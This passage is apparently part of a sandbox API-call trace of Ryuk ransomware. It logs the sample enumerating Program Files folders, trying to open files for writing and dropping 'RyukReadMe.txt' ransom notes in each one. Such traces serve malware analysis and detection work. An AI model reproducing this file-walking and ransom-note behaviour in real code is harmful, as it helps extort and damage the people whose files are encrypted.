(lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.784] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.784] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.784] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\sonicsptransform.ax", dwFileAttributes=0x80) returned 0 [0133.785] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\sonicsptransform.ax" (normalized: "c:\\program files\\dvd maker\\sonicsptransform.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.785] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.785] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.785] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0133.785] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0133.785] SetLastError (dwErrCode=0x0) [0133.785] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.785] GetLastError () returned 0x5 [0133.785] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0133.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.785] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0133.785] SetLastError (dwErrCode=0x0) [0133.785] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.785] GetLastError () returned 0x5 [0133.785] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0133.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.785] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0133.786] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.786] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.786] SetLastError (dwErrCode=0x0) [0133.786] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\program files\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.786] GetLastError () returned 0x5 [0133.786] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.786] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.786] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0133.786] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.787] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.787] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.787] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.787] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.787] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.787] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.787] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.787] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.787] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.787] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0133.787] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0133.787] SetLastError (dwErrCode=0x0) [0133.787] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\internet explorer\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.790] GetLastError () returned 0x5 [0133.790] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.790] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.790] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.790] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.790] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\ie8props.propdesc", dwFileAttributes=0x80) returned 0 [0133.791] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.791] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.791] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.791] SetLastError (dwErrCode=0x0) [0133.792] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\program files\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.792] GetLastError () returned 0x5 [0133.792] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.792] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.792] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0133.792] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.792] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.792] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.792] SetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins", dwFileAttributes=0x80) returned 0 [0133.793] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.793] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.793] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0133.793] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0133.793] SetLastError (dwErrCode=0x0) [0133.793] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\RyukReadMe.txt" (normalized: "c:\\program files\\internet explorer\\signup\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.793] GetLastError () returned 0x5 [0133.793] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.793] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.793] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0133.794] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0133.794] SetLastError (dwErrCode=0x0) [0133.794] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\program files\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.794] GetLastError () returned 0x5 [0133.794] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0133.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.794] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0133.794] SetLastError (dwErrCode=0x0) [0133.794] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.794] GetLastError () returned 0x5 [0133.794] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0133.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.794] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0133.794] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.794] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.794] SetLastError (dwErrCode=0x0) [0133.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.794] GetLastError () returned 0x5 [0133.794] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.795] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0133.795] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.795] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.795] SetLastError (dwErrCode=0x0) [0133.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.795] GetLastError () returned 0x5 [0133.795] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.795] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.795] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.796] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.796] SetLastError (dwErrCode=0x0) [0133.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.796] GetLastError () returned 0x5 [0133.796] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.796] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.796] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.798] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.798] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.798] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl", dwFileAttributes=0x80) returned 0 [0133.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.798] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.798] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.798] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.798] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl", dwFileAttributes=0x80) returned 0 [0133.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.799] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.799] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.799] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.800] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl", dwFileAttributes=0x80) returned 0 [0133.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.800] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.800] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.800] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.800] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl", dwFileAttributes=0x80) returned 0 [0133.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.801] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.801] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.801] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.801] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl", dwFileAttributes=0x80) returned 0 [0133.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.802] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.802] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.802] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.802] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl", dwFileAttributes=0x80) returned 0 [0133.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.805] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.805] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.805] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl", dwFileAttributes=0x80) returned 0 [0133.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.806] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.806] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.806] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.806] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl", dwFileAttributes=0x80) returned 0 [0133.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.807] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.807] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.807] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.807] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.808] SetLastError (dwErrCode=0x0) [0133.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.810] GetLastError () returned 0x5 [0133.810] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.810] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.810] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.810] SetLastError (dwErrCode=0x0) [0133.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 